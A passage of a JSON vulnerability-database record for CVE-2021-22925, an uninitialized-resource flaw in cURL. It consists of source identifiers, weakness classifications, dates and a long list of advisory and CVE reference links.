"db": "PACKETSTORM",
"id": "165099"
},
{
"db": "PACKETSTORM",
"id": "165862"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-009763"
},
{
"db": "NVD",
"id": "CVE-2021-22925"
}
]
},
"id": "VAR-202108-2221",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-381399"
}
],
"trust": 0.7003805
},
"last_update_date": "2026-03-09T20:13:33.055000Z",
"patch": {
"_id": null,
"data": [
{
"title": "Oracle\u00a0Critical\u00a0Patch\u00a0Update\u00a0Advisory\u00a0-\u00a0October\u00a02021 Siemens Siemens\u00a0Security\u00a0Advisory",
"trust": 0.8,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FRUCW2UVNYUDZF72DQLFQR4PJEC6CF7V/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-009763"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-908",
"trust": 1.1
},
{
"problemtype": "CWE-200",
"trust": 1.0
},
{
"problemtype": "Use of uninitialized resources (CWE-908) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-381399"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-009763"
},
{
"db": "NVD",
"id": "CVE-2021-22925"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 1.9,
"url": "https://hackerone.com/reports/1223882"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22925"
},
{
"trust": 1.2,
"url": "https://security.gentoo.org/glsa/202212-01"
},
{
"trust": 1.1,
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf"
},
{
"trust": 1.1,
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-484086.pdf"
},
{
"trust": 1.1,
"url": "https://security.netapp.com/advisory/ntap-20210902-0003/"
},
{
"trust": 1.1,
"url": "https://support.apple.com/kb/ht212804"
},
{
"trust": 1.1,
"url": "https://support.apple.com/kb/ht212805"
},
{
"trust": 1.1,
"url": "http://seclists.org/fulldisclosure/2021/sep/39"
},
{
"trust": 1.1,
"url": "http://seclists.org/fulldisclosure/2021/sep/40"
},
{
"trust": 1.1,
"url": "https://www.oracle.com/security-alerts/cpujan2022.html"
},
{
"trust": 1.1,
"url": "https://www.oracle.com/security-alerts/cpuoct2021.html"
},
{
"trust": 1.0,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/frucw2uvnyudzf72dqlfqr4pjec6cf7v/"
},
{
"trust": 0.8,
"url": "https://jvn.jp/vu/jvnvu91709091/"
},
{
"trust": 0.8,
"url": "https://jvn.jp/vu/jvnvu99030761/index.html"
},
{
"trust": 0.8,
"url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-069-09"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-16135"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2021-3200"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-5827"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2020-13435"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2019-5827"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2020-24370"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2019-13751"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2019-19603"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2019-17594"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-24370"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2020-12762"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2021-36086"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-13750"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-13751"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2021-22898"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-12762"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2020-16135"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2021-36084"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2021-3800"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17594"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2021-36087"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2021-3445"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-13435"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-19603"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2021-22925"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-18218"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2021-20232"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2019-20838"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2021-22876"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2021-20231"
},
{
"trust": 0.6,
"url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2020-14155"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20838"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2021-36085"
},
{
"trust": 0.6,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2021-33560"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2019-17595"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14155"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2021-28153"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2019-13750"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2019-18218"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2021-3580"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17595"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2021-27645"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2021-33574"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2021-35942"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2021-20266"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-3712"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-42574"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-20231"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-20232"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22898"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22876"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-20673"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-14145"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14145"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-23841"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2018-20673"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-23840"
},
{
"trust": 0.3,
"url": "https://issues.jboss.org/):"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-28153"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-20266"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2018-25013"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/vulnerabilities/rhsb-2021-009"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25012"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-35522"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-35524"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25013"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25009"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-43527"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2018-25014"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2018-25012"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-35521"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-35524"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3572"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3778"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-35522"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-37136"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-44228"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-17541"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-36331"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-31535"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-35523"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-36330"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-36332"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25010"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-17541"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25014"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-37137"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-21409"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3481"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2018-25009"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2018-25010"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-35523"
},
{
"trust": 0.2,
"url": "https://docs.openshift.com/container-platform/4.8/release_notes/ocp-4-8-release-notes.html"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3426"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3796"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-36330"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-35521"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22946"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22947"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33560"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3445"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3200"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3580"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-30830"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-30832"
},
{
"trust": 0.2,
"url": "https://support.apple.com/kb/ht201222"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-30828"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-0340"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-30841"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-30855"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-30843"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-30844"
},
{
"trust": 0.2,
"url": "https://support.apple.com/downloads/"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-30859"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-30829"
},
{
"trust": 0.2,
"url": "https://www.apple.com/support/security/pgp/"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-30857"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-30850"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-30865"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-30827"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-30847"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-30842"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-30860"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-23841"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-39293"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-29923"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-23840"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-27645"
},
{
"trust": 0.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/frucw2uvnyudzf72dqlfqr4pjec6cf7v/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:5128"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.8/logging/cluster-logging-upgrading.html"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.7/logging/cluster-logging-upgrading.html"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-20317"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-43267"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-36331"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:5127"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22922"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-27782"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-27776"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-27779"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-30115"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22576"
},
{
"trust": 0.1,
"url": "https://security.gentoo.org/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-35260"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22926"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-27781"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22945"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32208"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32206"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32207"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-27774"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-27775"
},
{
"trust": 0.1,
"url": "https://bugs.gentoo.org."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32205"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-27780"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-35252"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42916"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42915"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22923"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32221"
},
{
"trust": 0.1,
"url": "https://creativecommons.org/licenses/by-sa/2.5"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-36084"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-23177"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-23219"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:1081"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-24407"
},
{
"trust": 0.1,
"url": "https://open-policy-agent.github.io/gatekeeper/website/docs/howto/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3999"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-31566"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-23308"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3521"
},
{
"trust": 0.1,
"url": "https://catalog.redhat.com/software/containers/rhacm2/gatekeeper-rhel8/5fadb4a18d9a79d2f438a5d9."
},
{
"trust": 0.1,
"url": "https://open-policy-agent.github.io/gatekeeper/website/docs/howto/."
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-43565"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-31566"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-23177"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3521"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-23218"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-23806"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-29622"
},
{
"trust": 0.1,
"url": "https://support.apple.com/ht212805."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-30783"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-30713"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-30835"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-30858"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-30853"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-30845"
},
{
"trust": 0.1,
"url": "https://support.apple.com/ht212804."
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-23343"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-27304"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-32690"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3749"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:4902"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-23343"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27304"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3801"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-27218"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-33938"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3757"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-33930"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-33928"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/latest/migration_toolkit_for_containers/installing-mtc.html"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:4848"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-37750"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-27218"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-22947"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3948"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3733"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-33929"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-36222"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3620"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-22946"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:0434"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/openshift_container_platform/4.8/html/serverless/index"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/openshift_container_platform/4.6/html/serverless/index"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/openshift_container_platform/4.9/html/serverless/index"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33574"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-29923"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-38297"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/openshift_container_platform/4.7/html/serverless/index"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-381399"
},
{
"db": "PACKETSTORM",
"id": "165286"
},
{
"db": "PACKETSTORM",
"id": "165287"
},
{
"db": "PACKETSTORM",
"id": "170303"
},
{
"db": "PACKETSTORM",
"id": "166489"
},
{
"db": "PACKETSTORM",
"id": "164249"
},
{
"db": "PACKETSTORM",
"id": "164246"
},
{
"db": "PACKETSTORM",
"id": "165129"
},
{
"db": "PACKETSTORM",
"id": "165099"
},
{
"db": "PACKETSTORM",
"id": "165862"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-009763"
},
{
"db": "NVD",
"id": "CVE-2021-22925"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULHUB",
"id": "VHN-381399",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "165286",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "165287",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170303",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "166489",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "164249",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "164246",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "165129",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "165099",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "165862",
"ident": null
},
{
"db": "JVNDB",
"id": "JVNDB-2021-009763",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2021-22925",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2021-08-05T00:00:00",
"db": "VULHUB",
"id": "VHN-381399",
"ident": null
},
{
"date": "2021-12-15T15:20:33",
"db": "PACKETSTORM",
"id": "165286",
"ident": null
},
{
"date": "2021-12-15T15:20:43",
"db": "PACKETSTORM",
"id": "165287",
"ident": null
},
{
"date": "2022-12-19T13:48:31",
"db": "PACKETSTORM",
"id": "170303",
"ident": null
},
{
"date": "2022-03-28T15:52:16",
"db": "PACKETSTORM",
"id": "166489",
"ident": null
},
{
"date": "2021-09-22T16:35:10",
"db": "PACKETSTORM",
"id": "164249",
"ident": null
},
{
"date": "2021-09-22T16:33:18",
"db": "PACKETSTORM",
"id": "164246",
"ident": null
},
{
"date": "2021-12-02T16:06:16",
"db": "PACKETSTORM",
"id": "165129",
"ident": null
},
{
"date": "2021-11-30T14:44:48",
"db": "PACKETSTORM",
"id": "165099",
"ident": null
},
{
"date": "2022-02-04T17:26:39",
"db": "PACKETSTORM",
"id": "165862",
"ident": null
},
{
"date": "2022-05-19T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2021-009763",
"ident": null
},
{
"date": "2021-08-05T21:15:11.467000",
"db": "NVD",
"id": "CVE-2021-22925",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2023-01-05T00:00:00",
"db": "VULHUB",
"id": "VHN-381399",
"ident": null
},
{
"date": "2025-09-19T08:29:00",
"db": "JVNDB",
"id": "JVNDB-2021-009763",
"ident": null
},
{
"date": "2024-03-27T15:11:42.063000",
"db": "NVD",
"id": "CVE-2021-22925",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "165129"
}
],
"trust": 0.1
},
"title": {
"_id": null,
"data": "cURL\u00a0 Vulnerability in using uninitialized resources in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-009763"
}
],
"trust": 0.8
},
"type": {
"_id": null,
"data": "code execution",
"sources": [
{
"db": "PACKETSTORM",
"id": "165286"
},
{
"db": "PACKETSTORM",
"id": "165287"
},
{
"db": "PACKETSTORM",
"id": "165099"
}
],
"trust": 0.3
}
}